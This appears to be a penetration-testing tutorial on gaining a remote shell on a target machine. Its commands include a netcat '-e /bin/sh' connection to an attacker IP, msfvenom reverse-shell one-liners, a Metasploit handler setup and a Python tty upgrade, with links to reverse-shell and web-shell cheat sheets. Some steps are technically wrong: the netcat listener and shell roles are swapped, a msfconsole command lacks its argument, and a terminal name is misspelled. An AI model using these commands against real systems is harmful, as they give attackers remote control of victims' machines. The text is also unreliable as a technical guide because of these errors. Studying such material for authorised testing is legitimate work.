Getting a Remote Shell
Let’s assume you’ve found some sort of access to your target, ideally an upload vulnerability that will let you get some shellcode onto the target.
Netcat
You could just start a Netcat listener on the victim, if Netcat is available:
nc -lvnp 1234
… and start a shell on the attack box, as long as Netcat in a version that supports -e is available on it:
nc -e /bin/sh 192.168.0.10 1234
That should get you a shell, and if -e works, it’ll even be a good Bash shell.
Shellcode Resources
You can find all kinds of cool reverse shell code at Pentest Monkey:
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
See these detailed instructions for a PHP reverse shell:
http://pentestmonkey.net/tools/web-shells/php-reverse-shell.
This is a nice illustration of setting up the listener, etc.
And if you need to start with a web shell the Monkey has them here:
http://pentestmonkey.net/category/tools/web-shells
Msfvenom
But since we’re in Metasploit, it’s handy to use Metasploit’s msfvenom
to generate the commands for us. Metasploit has several payloads under “cmd/unix” that can be used to generate one-liner bind or reverse shells at
/usr/share/metasploit-framework/modules/payloads/singles/cmd/unix. Note that there are payloads for windows (and mainframes, who knows why) as well.
Often your limits are what’s supported on the target.
For instance, this payload can be used if the -e flag isn’t available in Netcat:
msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.0.10 LPORT=1234 R
And here’s a Perl example to use if Netcat isn’t installed:
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.0.10 LPORT=1234 R
On any msfvenom attack, you’ll need to set up a listener on the attack machine:
msf > use exploit/multi/handler msf > set PAYLOAD <Payload name> msf > set LHOST <LHOST value> msf > set LPORT <LPORT value> msf > set ExitOnSession false msf > exploit -j -z
Once you’ve set required options, the following command will execute your handler:
msf > msfconsole -L -r
Spawn a Bash Shell from Python
This Python command will get you a real pty once you’ve got a reverse shell opened. In that shell, enter:
echo $TERM # to get the xterm type, rows and columns to use below
python -c 'import pty; pty.spawn("/bin/bash");'
CTL-Z # or bg to background the above
stty raw -echo
fg # get back to our shell
reset
export SHELL=bash
export TERM=xterm256-color
stty rows 38 columns 116
— Above from this very nice tutorial:
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/.
Also look at the socat alternative on this page.
For succinct example code for several platforms, see this great cheatsheet/page:
https://netsec.ws/?p=331
And as always check out OffSec’s own page:
https://www.offensive-security.com/metasploit-unleashed/msfvenom/